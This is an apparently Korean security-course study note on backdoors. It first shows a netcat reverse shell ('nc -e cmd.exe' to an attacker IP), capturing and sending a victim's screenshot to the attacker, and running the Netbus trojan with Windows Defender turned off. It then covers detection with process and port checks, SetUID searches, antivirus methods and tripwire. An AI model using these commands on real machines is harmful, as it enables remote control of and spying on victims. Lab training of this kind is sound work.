[D+5] Backdoor (백도어) (2)

3. 백도어 (Backdoor)

3) 활용

▣ 방화벽 우회 백도어 (NetCat) / 리버스텔넷 - 희생자화면 캡처하기

- nc.exe 와 nircmd.exe가 필요함. (nircmd는 해킹툴이 아니고 명령어 실행툴)

- 희생자의 컴퓨터에 nc.exe와 nircmd.exe 파일을 심어놨다는 가정하에 진행.

① 공격자컴 : nc -l -p [포트번호]

② 희생자컴 : nc -e cmd.exe [공격자 IP] [포트번호]

----- 밑의 명령어들은 모두 공격자가 실행.

③ 붙은 희생자 cmd : nircmd savescreenshot [저장할 파일명]

④ 공격자 컴의 새로운 cmd 창 : nc -l -p [또다른 포트번호] > [저장할 파일명]

⑤ 붙은 희생자 cmd : type [전송할 파일명] | nc -w [전송시간] [공격자 IP] [포트번호]

☞ type 명령어는 리눅스에서의 cat명령어와 비슷. 파일을 본다.

☞ nc의 -w 옵션은 전송명령어

☞ 전송시간은 0 ~ 5 까지의 정수이며 3이 적당.

☞ 윈도우의 cmd에서 파일을 지우는 명령어 : erase

▣ 트로이 목마 (Netbus)

- 굉장히 오래된 악성코드 프로그램. 고로 기능이 막힌게 많다.

- 12345 포트를 사용하는 대표적인 트로이 목마형 백도어

① windows defender를 잠시 꺼야함.

② patch.exe 파일이 악성코드임 (백도어) -> 실행

☞ 희생자 컴퓨터에는 patch.exe를 실행시켜 놓으면 됨.

4) 백도어 탐지 기법 및 대응

▣ 현재 동작중인 프로세스 및 열린 포트 확인

- 백도어는 현재 실행중이어야만 의미가 있음.

- 프로세스 확인

☞ windows : cmd -tasklist 또는 작업 관리자

☞ linux : ps -aux

- 열린포트 확인

☞ windows : netstat -na

☞ linux : netstat -ntlp

- sysinternals suite (도구모음)

☞ procexp.exe (프로세스 점검)

☞ tcpview.exe (네트워크 점검) //포트들 찾기

- 백도어 탐지 및 삭제

1. 해당 프로세스 종료

2. win + R -> msconfig : 시작프로그램 확인

3. 레지스트리 확인

4. 백도어 파일 삭제

5. dir C:\[파일명] /s /a

☞ c드라이브 스캔 (patch.exe와 같은 백도어는 windows폴더안에 자신을 복제)

6. 백신 On!

▣ SetUID 파일 검사

- 수동으로 체크 : 한계점 존재 (해커가 원본파일 삭제 후 같은 명의 로컬 백도어 생성시 알아차리기 힘들다)

ex) find / -perm +4000 2>/dev/null

▣ 바이러스 및 백도어 탐지 툴 이용

- virustotal : 전세계 대표적인 백신으로 특정파일 검역

- 백신의 탐지 기법

1. 파일이름 (부정확)

2. 해시 -> 파일의 내용을 바꾸지않는한 이름만 바꿔서는 값이 고유(1:1 대응)

3. 시그니처 기반

4. opcode

5. 행동기반 -> 직접행동테스트

....

▣ 무결성 검사

- tripwire : 무결성 검사 자동화 도구

☞ 파일 생성 최초에 snapshot을 찍음(init) , 그 다음 안에 내용이 변했는지 아닌지 바뀐점을 체크.

- 설치 및 확인

1. 다운로드

2. 설치

rpm -Uvh tripwire.rpm

3. 설정파일 및 정책파일 생성

/usr/sbin/tripwire-setup-keyfiles

- site keyfile : 정책파일과 환경파일을 설정

- local keyfile : 데이터베이스와 레포트 파일을 초기화 및 보호

- site passpharse : 환경설정파일 생성을 위해 사이트 값 입력

4. 데이터베이스 초기화

tripwire --init

5. 백도어 생성

cd /root

backdoor <-- 로컬 백도어 작성(컴파일 및 4755 권한 부여)

6. 무결성 검사 시작

tripwire --check

7. 레포트 파일 확인

cd /var/lib/tripwire/report

twprint -m r --twrfile localhost.localdomain-XXXXXXXX.twr > 1.txt

more 1.txt

▣ 로그분석

- 로그분석은 포렌식 분야로 자리매김됨.

i2sec 대구지점 23기 수료생.